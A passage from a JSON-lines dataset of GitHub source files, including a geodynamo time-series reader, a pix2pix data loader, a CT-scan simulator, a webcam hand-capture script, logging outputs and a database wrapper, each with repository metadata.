4]\n self.dip_l11 = data[:, 5] # Cut at l=11\n self.dipTot = data[:, 6] # Also non axisymmetric dipole\n self.dipTot_cmb = data[:, 7] # Non-axi at the CMB\n self.dipTot_l11 = data[:, 8] # Cut at l=11\n self.e_dip_cmb = data[:, 9]\n self.e_dip_ax_cmb = data[:, 10]\n self.e_dip = data[:, 11]\n self.e_dip_ax = data[:, 12]\n self.ecmb = data[:, 13]\n self.egeo = data[:, 14]\n self.ratio_cmb_as = data[:, 16] # (e_cmb-e_es_cmb)/e_cmb\n self.ratio_cmb_naxi = data[:, 17] # (e_cmb-e_axi_cmb)/e_cmb\n self.ratio_l11_cmb_as = data[:, 18] # (e_geo-e_es_geo)/e_geo\n self.ratio_l11_cmb_naxi = data[:, 19] # (e_geo-e_axi_geo)/e_geo\n self.epol_axi_cmb = (-self.ratio_cmb_naxi*self.ecmb+self.ecmb)\n self.epol_rel_cmb = self.epol_axi_cmb/self.ecmb\n self.fdip = np.sqrt(self.dip_l11)\n elif self.field == 'AM':\n self.time = data[:, 0]\n self.am_oc_x = data[:, 1]\n self.am_oc_y = data[:, 2]\n self.am_oc_z = data[:, 3]\n self.am_ic = data[:, 4]\n self.am_ma = data[:, 5]\n self.amz = data[:, 6]\n self.damzdt = data[:, 7]\n elif self.field == 'rot':\n self.time = data[:, 0]\n self.omega_ic = data[:, 1]\n self.lorentz_torque_ic = data[:, 2]\n self.viscous_torque_ic = data[:, 3]\n self.omega_ma = data[:, 4]\n self.lorentz_torque_ma = data[:, 5]\n self.viscous_torque_ma = data[:, 6]\n elif self.field == 'Tay':\n self.time = data[:, 0]\n self.ekin_tora_rel = data[:, 1]\n self.egeos_rel = data[:, 2]\n self.tay = data[:, 3]\n self.tayR = data[:, 4]\n self.tayV = data[:, 5]\n self.ekin_cyl = data[:, 6]\n elif self.field == 'par':\n self.time = data[:, 0]\n self.rm = data[:, 1]\n self.elsasser = data[:, 2]\n self.rossby_l = data[:, 3]\n self.geos = data[:, 4]\n self.dipolarity = data[:, 5]\n self.dip_cmb = data[:, 6]\n self.dlV = data[:, 7]\n self.dmV = data[:, 8]\n self.lvDiss = data[:, 11]\n self.lbDiss = data[:, 12]\n self.dlB = data[:, 13]\n self.dmB = data[:, 14]\n self.els_cmb = data[:, 15]\n if data.shape[-1] > 16:\n self.rolc = data[:, 16]\n self.dlVc = data[:, 17]\n self.reEquat = data[:, 18]\n self.dlPolPeak = np.zeros_like(self.time)\n if data.shape[-1] == 20:\n self.dlPolPeak = data[:, 18]\n self.reEquat = data[:, 19]\n else:\n self.rolc = np.zeros_like(self.time)\n self.dlVc = np.zeros_like(self.time)\n self.reEquat = np.zeros_like(self.time)\n self.dlPolPeak = np.zeros_like(self.time)\n elif self.field == 'misc':\n self.time = data[:, 0]\n self.botnuss = data[:, 1]\n self.topnuss = data[:, 2]\n self.bottemp = data[:, 3] / np.sqrt(4.*np.pi)\n self.toptemp = data[:, 4] / np.sqrt(4.*np.pi)\n self.helrms = data[:, 8]\n self.helN = data[:, 5]*self.helrms\n self.helS = data[:, 6]*self.helrms\n try:\n self.botflux = data[:, 16]\n self.topflux = data[:, 17]\n except IndexError:\n self.botflux = np.zeros_like(self.time)\n self.topflux = np.zeros_like(self.time)\n pass\n elif self.field == 'geos':\n self.time = data[:, 0]\n self.geos = data[:, 1]\n self.ekin_ntc_rel = data[:, 2]\n self.ekin_stc_rel = data[:, 3]\n self.ekin = data[:, 4]\n self.corr_vz_otc = data[:, 5]\n self.corr_vortz_otc = data[:, 6]\n self.corr_hel_otc = data[:, 7]\n if data.shape[-1] == 8:\n self.geosA= np.zeros_like(self.time)\n self.geosZ= np.zeros_like(self.time)\n self.geosM= np.zeros_like(self.time)\n self.geosNAP = np.zeros_like(self.time)\n elif data.shape[-1] == 12:\n self.geosA = data[:, 8]\n self.geosZ = data[:, 9]\n self.geosM = data[:, 10]\n self.geosNAP = data[:, 11]\n elif self.field == 'heat':\n self.time = data[:, 0]\n self.botnuss = data[:, 1]\n self.topnuss = data[:, 2]\n self.deltaTnuss = data[:, 3]\n self.bottemp = data[:, 4]\n self.toptemp = data[:, 5]\n self.bots = data[:, 6]\n self.tops = data[:, 7]\n self.topflux = data[:, 8]\n self.botflux = data[:, 9]\n self.toppress = data[:, 10]\n self.mass = data[:, 11]\n try:\n self.botsherwood = data[:, 12]\n self.topsherwood = data[:, 13]\n self.deltasherwood = data[:, 14]\n self.botxi = data[:, 15]\n self.topxi = data[:, 16]\n except IndexError:\n self.topsherwood = np.ones_like(self.time)\n self.botsherwood = np.ones_like(self.time)\n self.deltasherwood = np.ones_like(self.time)\n self.botxi = np.zeros_like(self.time)\n self.topxi = np.zeros_like(self.time)\n pass\n elif self.field == 'helicity':\n self.time = data[:, 0]\n self.helN = data[:, 1]\n self.helS = data[:, 2]\n self.helRMSN = data[:, 3]\n self.helRMSS = data[:, 4]\n self.helnaN = data[:, 5]\n self.helnaS = data[:, 6]\n self.helnaRMSN = data[:, 7]\n self.helnaRMSS = data[:, 8]\n elif self.field == 'earth_like':\n self.time = data[:, 0]\n self.axial_dipole = data[:, 1]\n self.symmetry = data[:, 2]\n self.zonality = data[:, 3]\n self.flux_concentration = data[:, 4]\n self.chi_square = ((np.log(self.axial_dipole)-np.log(1.4))/np.log(2.))**2+\\\n ((np.log(self.symmetry)-np.log(1.))/np.log(2.))**2+\\\n ((np.log(self.zonality)-np.log(0.15))/np.log(2.5))**2+\\\n ((np.log(self.flux_concentration)-np.log(1.5))/np.log(1.75))**2\n elif self.field == 'u_square':\n self.time = data[:, 0]\n self.ekin_pol = data[:, 1]\n self.ekin_tor = data[:, 2]\n self.ekin_pol_axi = data[:, 3]\n self.ekin_tor_axi = data[:, 4]\n self.ekin_tot = self.ekin_pol + self.ekin_tor\n self.ro = data[:, 5]\n self.rm = data[:, 6]\n self.rossby_l = data[:, 7]\n self.dl = data[:, 8]\n elif self.field == 'perpPar':\n self.time = data[:, 0]\n self.eperp = data[:, 1]\n self.epar = data[:, 2]\n self.eperp_axi = data[:, 3]\n self.epar_axi = data[:, 4]\n self.ekin_tot = self.eperp+self.epar\n elif self.field == 'phase':\n self.time = data[:, 0]\n self.rmelt = data[:, 1]\n self.trmelt = data[:, 2]\n self.volS = data[:, 3]\n self.ekinS = data[:, 4]\n self.ekinL = data[:, 5]\n self.flux_cmb = data[:, 6]\n self.flux_icb = data[:, 7]\n self.dEnthdt = data[:, 8]\n elif self.field == 'hemi':\n self.time = data[:, 0]\n self.hemi_vr = data[:, 1]\n self.hemi_ekin = data[:, 2]\n self.hemi_br = data[:, 3]\n self.hemi_emag = data[:, 4]\n self.hemi_cmb = data[:, 5]\n self.ekin = data[:, 6]\n self.emag = data[:, 7]\n elif self.field == 'dtVrms':\n self.time = data[:, 0]\n self.InerRms = data[:, 1]\n self.CorRms = data[:, 2]\n self.LFRms = data[:, 3]\n self.AdvRms = data[:, 4]\n self.DifRms = data[:, 5]\n self.BuoRms = data[:, 6]\n\n if data.shape[1] == 14:\n self.PreRms = data[:, 7]\n self.geos = data[:, 8] # geostrophic balance\n self.mageos = data[:, 9] # magnetostrophic balance\n self.arcMag = data[:, 10] # Coriolis/Pressure/Buoyancy/Lorentz\n self.corLor = data[:, 11] # Coriolis/Lorentz\n self.preLor = data[:, 12] # Pressure/Lorentz\n self.cia = data[:, 13] # Coriolis/Inertia/Archmedean\n self.arc = np.zeros_like(self.geos)\n self.ChemRms = np.zeros_like(self.geos)\n elif data.shape[1] == 15:\n self.PreRms = data[:, 7]\n self.geos = data[:, 8] # geostrophic balance\n self.mageos = data[:, 9] # magnetostrophic balance\n self.arc = data[:, 10] # Coriolis/Pressure/Buoyancy\n self.arcMag = data[:, 11] # Coriolis/Pressure/Buoyancy/Lorentz\n self.corLor = data[:, 12] # Coriolis/Lorentz\n self.preLor = data[:, 13] # Pressure/Lorentz\n self.cia = data[:, 14] # Coriolis/Inertia/Archmedean\n self.ChemRms = np.zeros_like(self.geos)\n elif data.shape[1] == 16:\n self.ChemRms = data[:, 7]\n self.PreRms = data[:, 8]\n self.geos = data[:, 9] # geostrophic balance\n self.mageos = data[:, 10] # magnetostrophic balance\n self.arc = data[:, 11] # Coriolis/Pressure/Buoyancy\n self.arcMag = data[:, 12] # Coriolis/Pressure/Buoyancy/Lorentz\n self.corLor = data[:, 13] # Coriolis/Lorentz\n self.preLor = data[:, 14] # Pressure/Lorentz\n self.cia = data[:, 15] # Coriolis/Inertia/Archmedean\n elif data.shape[1] == 18:\n self.ChemRms = data[:, 7]\n self.PreRms = data[:, 8]\n self.MagTensRms = data[:, 9] # Magnetic tension\n self.MagPreRms = data[:, 10] # Magnetic pressure\n self.geos = data[:, 11] # geostrophic balance\n self.mageos = data[:, 12] # magnetostrophic balance\n self.arc = data[:, 13] # Coriolis/Pressure/Buoyancy\n self.arcMag = data[:, 14] # Coriolis/Pressure/Buoyancy/Lorentz\n self.corLor = data[:, 15] # Coriolis/Lorentz\n self.preLor = data[:, 16] # Pressure/Lorentz\n self.cia = data[:, 17] # Coriolis/Inertia/Archmedean\n\n elif self.field == 'dtBrms':\n self.time = data[:, 0]\n self.dtBpolRms = data[:, 1]\n self.dtBtorRms = data[:, 2]\n self.DynPolRms = data[:, 3]\n self.DynTorRms = data[:, 4]\n self.DifPolRms = data[:, 5]\n self.DifTorRms = data[:, 6]\n self.omEffect = data[:, 7]\n self.omega = data[:, 8]\n self.DynDipRms = data[:, 9]\n self.DynDipAxRms = data[:, 10]\n elif self.field == 'dtE':\n self.time = data[:, 0]\n self.dEdt = data[:, 1]\n self.intdEdt = data[:, 2]\n self.reldEdt = data[:, 3]\n elif self.field == 'power':\n self.time = data[:, 0]\n self.buoPower = data[:, 1]\n if data.shape[1] == 11:\n self.buoPower_chem = data[:, 2]\n self.icrotPower = data[:, 3]\n self.mantlerotPower = data[:, 4]\n self.viscDiss = data[:, 5]\n self.ohmDiss = data[:, 6]\n self.icPower = data[:, 7]\n self.mantlePower = data[:, 8]\n elif data.shape[1] == 10:\n self.buoPower_chem = np.zeros_like(self.time)\n self.icrotPower = data[:, 2]\n self.mantlerotPower = data[:, 3]\n self.viscDiss = data[:, 4]\n self.ohmDiss = data[:, 5]\n self.icPower = data[:, 6]\n self.mantlePower = data[:, 7]\n if abs(self.ohmDiss).max() != 0:\n self.fohm = -self.ohmDiss/(self.buoPower+self.buoPower_chem)\n self.fvis = -self.viscDiss/(self.buoPower+self.buoPower_chem)\n elif self.field == 'SRIC':\n self.time = data[:,0]\n self.omega_ic = data[:,1]\n self.viscPower = data[:,2]\n self.totPower = data[:,3]\n self.LorPower = data[:,4]\n self.viscTorq = abs(self.viscPower/self.omega_ic)\n self.totTorq = abs(self.totPower/self.omega_ic)\n self.LorTorq = abs(self.LorPower/self.omega_ic)\n elif self.field in ('am_mag_pol', 'am_mag_tor', # Tayler instability\n 'am_kin_pol', 'am_kin_tor'):\n self.time = data[:, 0]\n self.coeffs = data[:, 1:]\n else:\n print('The field \"{}\" is not know'.format(self.field))\n\n def __add__(self, new):\n \"\"\"\n This method allows to sum two look up tables together. This is python\n built-in method.\n \"\"\"\n\n out = copy.deepcopy(new)\n timeOld = self.time[-1]\n timeNew = new.time[0]\n\n for attr in new.__dict__.keys():\n if attr == 'coeffs':\n out.__dict__[attr] = np.vstack((self.__dict__[attr],\n out.__dict__[attr][1:, :]))\n elif attr != 'field':\n if attr in self.__dict__.keys(): # If the argument already existed\n if timeOld != timeNew:\n out.__dict__[attr] = np.hstack((self.__dict__[attr],\n out.__dict__[attr]))\n else: # Same time\n out.__dict__[attr] = np.hstack((self.__dict__[attr],\n out.__dict__[attr][1:]))\n\n return out\n","repo_name":"magic-sph/magic","sub_path":"python/magic/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":45626,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"31"} +{"seq_id":"3514047287","text":"word = list(input())\n\nfor i in range(len(word)):\n word[i] = word[i].upper()\n\nword_list = list(set(word))\nnum_list = list()\nfor i in range(len(word_list)):\n num_list.append(0)\n\nfor i in range(len(word_list)):\n for j in word:\n if word_list[i] == j:\n num_list[i] = num_list[i] + 1\n\nnum_li = sorted(num_list)\nif num_li[-1] == num_li[-2]:\n print(\"?\")\nelse:\n print(word_list[num_list.index(max(num_list))])\n\n# 런타임 오류 뜸\n\nword = input().lower()\nword_list = list(set(word))\ncnt = []\n\nfor i in word_list:\n count = word.count(i)\n cnt.append(count)\n\nif cnt.count(max(cnt)) >= 2:\n print(\"?\")\nelse:\n print(word_list[cnt.index(max(cnt))].upper())\n \n\n \n\n\n","repo_name":"jeongseokmandoo/study","sub_path":"algorithm/class/class1/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1598753842","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\nData Loader:\nLoads the membrane cell segmentation dataset\n\nAdapted and simplified from: \nhttps://github.com/zhixuhao/unet/blob/master/data.py\n\"\"\"\n\ndef normalize(x):\n return (x - 0.5)*2\n\ndef denormalize(x):\n return (x/2)+0.5\n\ndef dataLoader(directory, data_generator, batch_sz=1, shuffle=True, \n img_sz=(256, 256), seed=1):\n\n input_subdir = 'input'\n target_subdir = 'target'\n\n # Input generator\n x_gen = data_generator.flow_from_directory(\n directory,\n target_size=img_sz,\n color_mode=\"rgb\",\n classes=[input_subdir],\n class_mode=None,\n batch_size=batch_sz,\n shuffle=shuffle,\n seed=seed,\n interpolation='nearest'\n )\n \n # Target generator\n y_gen = data_generator.flow_from_directory(\n directory,\n target_size=img_sz,\n color_mode=\"rgb\",\n classes=[target_subdir],\n class_mode=None,\n batch_size=batch_sz,\n shuffle=shuffle,\n seed=seed,\n interpolation='nearest'\n )\n\n generator = zip(x_gen, y_gen)\n for (x, y) in generator:\n x, y = normalize(x), normalize(y)\n yield (x, y)\n\n\ndef show_augmentation(img_filepath, imageDataGenerator, n_rows=1):\n n_cols = 4\n img = load_img(img_filepath)\n x = img_to_array(img)\n x = x.reshape((1,) + x.shape) \n \n fig = plt.figure(figsize=(16, 8))\n i = 1\n for batch in imageDataGenerator.flow(x, batch_size=1, seed=1):\n ax = fig.add_subplot(n_rows, n_cols, i)\n ax.imshow(batch[0])\n ax.axis('off')\n i += 1\n if i > n_rows*n_cols: break\n plt.show();\n return\n\n\ndef show_sample(generator):\n batch = next(generator)\n x = denormalize(batch[0][0])\n y = denormalize(batch[1][0])\n \n size = (5, 5)\n plt.figure(figsize=size)\n plt.imshow(x)\n plt.show()\n plt.figure(figsize=size)\n plt.imshow(y)\n plt.show();\n return","repo_name":"a-martyn/pix2pix","sub_path":"model/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"22664200327","text":"from computed_tomography.cls_pixel_grid import *\nfrom computed_tomography.func_projection_iterates import *\nfrom numpy import nditer, linspace, matmul, uint8\nfrom PIL import Image\nfrom math import ceil\nfrom time import time\n\n\nclass CAT_Scanner:\n \"\"\"A class which simulates a Computed Tomography (CT) scan on a given image with a constructed beam array.\"\"\"\n\n def __init__(self, imageObj, beamArray, doConvertToGrayscale: bool = True):\n \"\"\"Initialize a CAT Scanner on an image with a beam array.\"\"\"\n\n # set the contained image, its width, height, and number of pixels\n self.image = imageObj\n self.imageWidth, self.imageHeight = self.image.size\n self.numberOfPixels = self.imageWidth * self.imageHeight\n\n # set the beam array at an angle of 0 degrees to the circumcircle of the image; that is, place the beam array\n # on the left side of the circumcircle\n self.beamArray = beamArray\n self.beamArray.set_central_angle(0)\n\n # set a pixel grid object, which helps in deciding which pixels are hit by each beam\n self.pixelGrid = pixel_grid(self.imageWidth, self.imageHeight)\n\n # pixel densities of the original image\n self.pixelDensityArr = self.to_pixel_densities(self.image, doConvertToGrayscale)\n\n # matrices A and B are used for computing the reconstructed image\n # matrix A contains information on which pixels are struck by each beam\n # matrix B tells how much of each beam is absorbed as it passes through the image\n self.matrixA = array([])\n self.matrixB = array([])\n\n # flag which is set to true once the image is already scanned\n self.isScanned = False\n\n def change_image(self, newImageObj, doConvertToGrayscale: bool = True):\n \"\"\"Switches the image of the scanner to another chosen image object.\"\"\"\n\n # initialize the scanner again but with the new image\n self.image = newImageObj\n self.imageWidth, self.imageHeight = self.image.size\n self.numberOfPixels = self.imageWidth * self.imageHeight\n self.pixelGrid = pixel_grid(self.imageWidth, self.imageHeight)\n self.pixelDensityArr = self.to_pixel_densities(self.image, doConvertToGrayscale)\n self.matrixA = array([])\n self.matrixB = array([])\n self.isScanned = False\n\n def change_beam_array(self, newBeamArray):\n \"\"\"Switch the beam array used in the scan\"\"\"\n self.beamArray = newBeamArray\n self.beamArray.set_central_angle(0)\n\n def to_pixel_densities(self, imageObj, doConvertToGrayscale):\n \"\"\"Converts an image to a grayscale image and returns an array consisting of pixel densities ranging from 0\n (white) to 10 (black).\"\"\"\n\n funcGrayscale = lambda r, g, b: ceil(0.2989 * r + 0.5870 * g + 0.1140 * b)\n funcScaleTo10 = lambda colorInt: 10 - 10 * colorInt / 255\n\n pixelRGBArr = array(imageObj)\n pixelDensityFlat = []\n\n r = 0\n red, green, blue = 0, 0, 0\n for colorPart in nditer(pixelRGBArr):\n color = int(colorPart)\n r += 1\n if r == 1:\n red = color\n elif r == 2:\n green = color\n elif r == 3:\n blue = color\n r = 0\n if doConvertToGrayscale:\n pixelDensity = funcScaleTo10(funcGrayscale(red, green, blue))\n else:\n pixelDensity = funcScaleTo10(red)\n pixelDensityFlat.append(pixelDensity)\n\n pixelDensityArr = array(pixelDensityFlat).reshape((self.imageHeight, self.imageWidth))\n return pixelDensityArr\n\n def scan(self, numberOfDirections):\n \"\"\"Rotate the beam array around the image in a selected number of directions spaced evenly across the\n circumcircle of the image.\"\"\"\n\n time1 = time()\n scanningAngles = linspace(0, 360, numberOfDirections+1)[:-1]\n submatricesA = []\n for scanAngle in scanningAngles:\n self.beamArray.set_central_angle(scanAngle)\n submatrixA = self.pixelGrid.coefficient_array_center_line(self.beamArray)\n submatricesA.append(submatrixA)\n\n self.matrixA = vstack(tuple(submatricesA))\n vectorX = self.pixelDensityArr.flatten()\n self.vectorB = matmul(self.matrixA, vectorX)\n time2 = time()\n\n timeTaken = round(time2 - time1, 3)\n print(f\"Image successfully scanned in {timeTaken} s. \\n\")\n self.isScanned = True\n\n def to_color_values(self, arrayObj):\n \"\"\"Translates an array of pixel densities into an array of equivalent RGB colors, ranging from white (0) to\n black (10).\"\"\"\n funcToGrayscaleValue = lambda x: ceil(255*(10-x) / 10)\n funcToColorRGB = lambda g: [g, g, g]\n\n colorValuesFlat = []\n for x in nditer(arrayObj):\n colorValue = funcToColorRGB(funcToGrayscaleValue(x))\n colorValuesFlat.append(colorValue)\n colorValues = array(colorValuesFlat, uint8).reshape((self.imageHeight, self.imageWidth, 3))\n\n return colorValues\n\n def reconstruct_image(self, iterations):\n \"\"\"Reconstruct a grayscale version of the scanned image by using an iterative projection algorithm specified\n a number of iterations.\n\n NOTE: This step may take a while to execute especially with images of size 30 x 30 pixels or larger.\"\"\"\n\n if not self.isScanned:\n raise Exception(\"Image has not yet been scanned; call CAT_Scanner.scan(n) to scan the image\")\n\n initialVectorX = array([0.0]*self.numberOfPixels)\n vectorOriginalX = self.pixelDensityArr.flatten()\n\n time1 = time()\n vectorApproxX = projection_iterates(initialVectorX, self.matrixA, self.vectorB, iterations, False)\n time2 = time()\n\n timeTaken = round(time2 - time1, 3)\n print(f\"Image reconstructed in {timeTaken} s \\n\")\n\n colorsRGBX = self.to_color_values(vectorApproxX)\n reconstructedImage = Image.fromarray(colorsRGBX)\n\n return reconstructedImage\n\n def __repr__(self):\n return f\"CAT_Scanner of {self.image}\"\n","repo_name":"NotAMadTheorist/the-pythons-nest","sub_path":"Computed Tomography/computed_tomography/cls_CAT_Scanner.py","file_name":"cls_CAT_Scanner.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32512661382","text":"\"\"\"\n실시간 영상에서 C를 누르면 0.5초마다 한 번씩 손을 캡쳐하는 코드\n\"\"\"\n\nimport cv2\nimport mediapipe as mp\nimport numpy as np\nimport os\nimport time\n\n# ===== 파일 이름 설정!!!! 각자 바꿔줘야 하는 부분!! ===== #\nyour_name = \"hyemi2\" # 이름\nhand_pose = \"scissor\" # rock, paper, scissor\ncapture_count = 51 # 첫 번째 실행 땐 1, 두 번째 실행 땐 51로 고쳐주세요\n# ===================================================== #\n\nif not os.path.exists(f'./{your_name}'):\n os.mkdir(f'./{your_name}')\n os.mkdir(f'./{your_name}/paper_captures')\n os.mkdir(f'./{your_name}/paper')\n os.mkdir(f'./{your_name}/rock_captures')\n os.mkdir(f'./{your_name}/rock')\n os.mkdir(f'./{your_name}/scissor_captures')\n os.mkdir(f'./{your_name}/scissor')\n\ncollect_mode = False\ncapture_end = capture_count + 49\n\n# ===== Mediapipe, Camera Settings ===== #\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\ncap = cv2.VideoCapture(0)\n# Open Hand module\nhands = mp_hands.Hands(max_num_hands = 1, # 손은 한 개만 감지하게 함\n min_detection_confidence = 0.5,\n min_tracking_confidence = 0.5)\n\ntry:\n # ===== Open Camera ===== #\n while cap.isOpened():\n\n # Read a frame\n success, image = cap.read()\n if not success:\n continue\n height, width, _ = image.shape\n\n # Convert color channel while flip image to selfie mode\n image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)\n\n # Process hand detection\n results = hands.process(image)\n\n # Convert color channel back to CV2's channel\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # ===== When hand tracking succeeded ===== #\n if results.multi_hand_landmarks:\n\n # list of each landmark's location\n landmarks = []\n\n # Traverse every landmark in a hand\n for hand_landmarks in results.multi_hand_landmarks:\n\n # ===== Make a Bounding Box ===== #\n # Contain each landmark's location\n for i in range(len(hand_landmarks.landmark)):\n landmarks.append([int(hand_landmarks.landmark[i].x * width),\n int(hand_landmarks.landmark[i].y * height)])\n\n # Straight bounding box\n x, y, w, h = cv2.boundingRect(np.array(landmarks))\n #cv2.rectangle(image, (x,y), (x+w,y+h), (0,0,255), 2)\n \n # ===== Make 300 * 200 box, on the axis of the center ===== #\n # With the premize that the camera is at the side of a hand\n center = {'x': x+w//2, 'y': y+h//2}\n # cv2.circle(image, (center['x'], center['y']), 2, (255,0,0), 1)\n # Calculate a region of interest\n startX = center['x'] - 150\n startY = center['y'] - 100\n endX = center['x'] + 150\n endY = center['y'] + 100\n cv2.rectangle(image, (startX,startY), (endX,endY), (0,255,0), 2)\n\n # 랜드마크 그리기 - 데이터 수집할 땐 주석처리해야 함\n # mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS)\n\n # Show frames\n cv2.imshow('WebCam', image)\n\n # Trigger for capturing\n if cv2.waitKey(1) == ord('c'):\n collect_mode = True\n\n # 데이터 수집 모드 발동!\n if collect_mode == True:\n\n if capture_count <= capture_end:\n # Save image\n roi = image[startY:endY, startX:endX]\n\n # Create file path\n file_path = f\"./{your_name}/{hand_pose}_captures/{your_name}_{hand_pose}_{capture_count}.png\"\n capture_count += 1\n # Save an image\n cv2.imwrite(file_path, roi)\n print(f\"Captured {file_path}\")\n\n time.sleep(1) # 1초마다 캡쳐\n\n else:\n collect_mode = False\n print(\"Data Collect mode off\")\n\n if cv2.waitKey(1) == 27:\n break\n \nexcept Exception as e:\n print(\"Exception occurred:\", e)\nfinally:\n cap.release()\n","repo_name":"Hyempire/RockPaperScissor","sub_path":"DataCollection/CaptureImages.py","file_name":"CaptureImages.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23816254701","text":"from __future__ import print_function, unicode_literals\nimport json\n\nclass Output(object):\n\n def __init__(self, config):\n self.match = config.get('match', [])\n\n def send(self, target, data):\n if self.match:\n for match in self.match:\n matched = True\n for k in match:\n if data.get(k) != match[k]:\n matched = False\n break\n if matched:\n return self._send(target, data)\n else:\n return self._send(target, data)\n\n def _send(self, target, data):\n raise NotImplementedError()\n\nclass UDPLoggerOutput(Output):\n\n def __init__(self, config):\n super(UDPLoggerOutput, self).__init__(config)\n from udplogger.client import Client\n self.client = Client(host=config['host'],\n port=config['port'])\n\n def _send(self, target, data):\n self.client.send(table=target, data=data)\n\nclass RedMsgOutput(Output):\n\n def __init__(self, config):\n super(RedMsgOutput, self).__init__(config)\n from redmsg import Publisher\n self.client = Publisher(host=config['host'],\n port=config['port'],\n db=config['db'],\n ttl=config.get('ttl', 3600))\n\n def _send(self, target, data):\n self.client.publish(target, json.dumps(data))\n\nOUTPUTS = {\n 'udplogger': UDPLoggerOutput,\n 'redmsg': RedMsgOutput,\n}\n\ndef create_output(config):\n return OUTPUTS[config['type']](config)\n","repo_name":"ivotkv/weblogger","sub_path":"weblogger/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37172050814","text":"import os\n\nDATABASE_SETTINGS = {\n 'driver': 'psycopg2', # sqlite3 or psycopg2\n\n # For sqlite, name of DB file.\n # For postgres, name of database.\n 'database': 'lupe.db', # postgres\n 'username': 'lupe', # postgres only\n 'password': 'lupe', # postgres only\n 'host': None, # postgres only, if the DB is on a different machine\n 'port': 5432, # postgres only, this is the default value.\n}\n\nDB_DRIVER = __import__(DATABASE_SETTINGS['driver'], globals(), locals(), [], -1)\n\nclass Database(object):\n\n def __init__(self):\n self.connection = None\n if not self.is_sqlite() and not self.is_postgres():\n raise ValueError(\"Unsupported Database Driver: \"\n + DATABASE_SETTINGS['driver'])\n\n @property\n def settings(self):\n return DATABASE_SETTINGS\n\n @property\n def wildcard(self):\n '''engine-specific character sequence to indicate query parameters\n in SQL statments.'''\n\n if self.is_sqlite():\n return '?'\n elif self.is_postgres():\n return '%s'\n\n @property\n def exception_error_class(self):\n return DB_DRIVER.Error\n\n def escape_symbol(self, symbol):\n if symbol.literal:\n return self.wildcard\n\n if self.is_sqlite():\n return symbol.value\n elif self.is_postgres():\n return symbol.value.replace('%s', '%%s')\n\n def exception_info(self, exception):\n if self.is_sqlite():\n return exception.args[0]\n elif self.is_postgres():\n return ': '.join((exception.pgcode, exception.pgerror))\n\n def is_sqlite(self):\n return self.settings['driver'] == \"sqlite3\"\n\n def is_postgres(self):\n return self.settings['driver'] == \"psycopg2\"\n\n def connect(self):\n if self.connection:\n return self # so that we can proxy calls to the connection.\n\n if self.is_sqlite():\n self.connection = DB_DRIVER.connect(os.path.join(\n self.settings['directory'],\n self.settings['database']))\n\n elif self.is_postgres():\n self.connection = DB_DRIVER.connect(\n database=self.settings['database'],\n user=self.settings['username'],\n password=self.settings['password'],\n port=self.settings['port'],\n host=self.settings['host'])\n\n return self\n\n def execute(self, query, params=()):\n if not self.connection:\n raise ValueError(\"Must connect to database before running queries.\")\n\n if self.is_sqlite():\n return self.connection.execute(query, params)\n\n elif self.is_postgres():\n cursor = self.connection.cursor()\n cursor.execute(query, params)\n return cursor\n\n def close(self):\n self.connection.close()\n self.connection = None\n\nDATABASE = Database()\n","repo_name":"salspaugh/lupe","sub_path":"lupe/clustering/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"41166881042","text":"import logging\nimport numpy as np\nfrom common.constant.df_from_csv import WORD_LIST_FOR_CMP\nfrom core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator\n\n\nclass CMPResponseGenerator(BaseResponseGenerator):\n def __call__(self):\n return self.create_cmp()\n\n def create_cmp(self):\n try:\n cmp_sent_list = []\n\n target_word_row = \\\n self.message.text_df[self.message.text_df[\"base_form\"].isin(WORD_LIST_FOR_CMP.word.tolist())].iloc[-1]\n\n alternative_sentiment_words = \\\n WORD_LIST_FOR_CMP.loc[WORD_LIST_FOR_CMP.word.isin([target_word_row.base_form]), \"cmp_word\"].values[\n 0]\n alternative_sentiment_word = np.random.choice(alternative_sentiment_words.split(), 1)[0]\n\n subject_list = [\"you \", \"it \", \"that \", \"\"]\n auxiliary_verb_list = [\"must \", \"should \"]\n verb_list_for_auxiliary_verb = [\"feel \", \"be \"]\n sounds_seems_list = [\"sound\", \"sound like\"]\n adverb_list = [\"really \", \"seriously \", \"pretty \", \"very \"]\n subject = np.random.choice(subject_list, 1)[0]\n\n if subject in [\"it \", \"that \", \"\"]:\n sounds_seems_list = [\"sounds\", \"sounds like\"]\n\n adverb = np.random.choice(adverb_list, 1)[0] if any(\n [i <= -120 for i in self.message.sentiment_score_df.nscore.values]) else \"\"\n word_type_before_sentiment_word = np.random.choice([\"auxiliary_verb\", \"sound_seem\"], 1)[0]\n if word_type_before_sentiment_word == \"auxiliary_verb\":\n auxiliary_verb = np.random.choice(auxiliary_verb_list, 1)[0]\n verb_for_auxiliary_verb = np.random.choice(verb_list_for_auxiliary_verb, 1)[0]\n verb = auxiliary_verb + verb_for_auxiliary_verb\n main_words = subject + verb + adverb + alternative_sentiment_word + \"..\"\n else:\n verb = np.random.choice(sounds_seems_list, 1)[0] + \" \"\n main_words = subject + verb + adverb + alternative_sentiment_word + \"..\"\n\n cmp_sent_list.append(main_words)\n\n 